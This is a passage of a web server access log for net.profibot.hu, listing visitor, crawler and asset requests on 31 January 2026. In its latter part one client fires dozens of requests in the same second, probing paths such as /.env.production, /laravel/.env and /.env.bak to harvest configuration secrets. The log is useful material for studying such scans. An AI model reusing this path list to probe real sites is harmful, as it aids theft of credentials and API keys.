GET https net.profibot.hu "/api/" [Client 52.42.39.195] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:48 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 52.42.39.195] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:48 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 52.42.39.195] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:48 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 52.42.39.195] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "-" +[31/Jan/2026:11:35:48 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 52.42.39.195] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:35:48 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-text-horizontal-grey.png" [Client 52.42.39.195] [Length 22203] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1" "https://net.profibot.hu/" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 84.254.106.197] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 84.254.106.197] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 84.254.106.197] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 84.254.106.197] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 84.254.106.197] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 84.254.106.197] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:45:13 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 84.254.106.197] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[31/Jan/2026:11:48:36 +0000] - 200 200 - HEAD https net.profibot.hu "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-" +[31/Jan/2026:12:11:44 +0000] - - 301 - GET http net.profibot.hu "/" [Client 34.61.217.64] [Length 166] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "-" +[31/Jan/2026:12:11:45 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 34.61.217.64] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" "-" +[31/Jan/2026:12:15:09 +0000] - 200 200 - GET https net.profibot.hu "/robots.txt" [Client 216.73.216.89] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:12:15:09 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 216.73.216.89] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:12:19:04 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 37.76.47.34] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:12 +0000] - 200 200 - GET https net.profibot.hu "/" [Client 23.27.145.36] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:33:13 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 23.27.145.36] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:14 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 23.27.145.36] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:15 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 23.27.145.36] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:20 +0000] - 200 200 - GET https net.profibot.hu "/api/" [Client 23.27.145.36] [Length 74] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:21 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-gE2qX1Ef.js" [Client 23.27.145.36] [Length 2475] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:33:21 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-swCRRsQW.css" [Client 23.27.145.36] [Length 28] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:21 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 23.27.145.36] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:12:33:23 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-text-horizontal-grey.png" [Client 23.27.145.36] [Length 22203] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://net.profibot.hu/" +[31/Jan/2026:14:31:49 +0000] - 200 200 - GET https net.profibot.hu "/robots.txt" [Client 216.73.216.89] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:31:49 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-16x16.png" [Client 216.73.216.89] [Length 1512] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:33:27 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-7pxQYCJT.css" [Client 216.73.216.89] [Length 543672] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:33:32 +0000] - 200 200 - GET https net.profibot.hu "/images/logo-no-text.svg" [Client 216.73.216.89] [Length 9008] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:34:36 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/safari-pinned-tab.svg" [Client 216.73.216.89] [Length 5718] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:34:37 +0000] - 200 200 - GET https net.profibot.hu "/assets/index-Bjey8ZS4.js" [Client 216.73.216.89] [Length 2112451] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:35:41 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon-32x32.png" [Client 216.73.216.89] [Length 2696] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:37:25 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/site.webmanifest" [Client 216.73.216.89] [Length 458] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:38:02 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/favicon.ico" [Client 216.73.216.89] [Length 15086] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:14:41:09 +0000] - 200 200 - GET https net.profibot.hu "/images/favicon/apple-touch-icon.png" [Client 216.73.216.89] [Length 16709] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/server/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/wp-content/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/dist/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/netlify.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.development" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/src/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/flask/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/k8s/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.gcloud/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 404 404 - GET https net.profibot.hu "/api/v3/.env" [Client 216.81.248.135] [Length 55] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/render/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/modules/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/prestashop/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/deployment/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.004" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.old11" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/storage/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/domains/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/nuxt/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/backup/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.live" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/wordpress/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/wp-content/plugins/stripe-payments/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.private/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.output/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/remix/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.dev" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/src/.env.production" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/express/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/vercel/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/build/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/shopify/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/pods/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.config/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/payments/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.github/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/astro/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/webroot/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/uploads/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/laravel/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/app/etc/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/jenkins/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/deploy/.env" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.v20" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.2024-01" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak1" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[31/Jan/2026:15:13:23 +0000] - 200 200 - GET https net.profibot.hu "/.env.bak" [Client 216.81.248.135] [Length 701] [Gzip -] [Sent-to 127.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 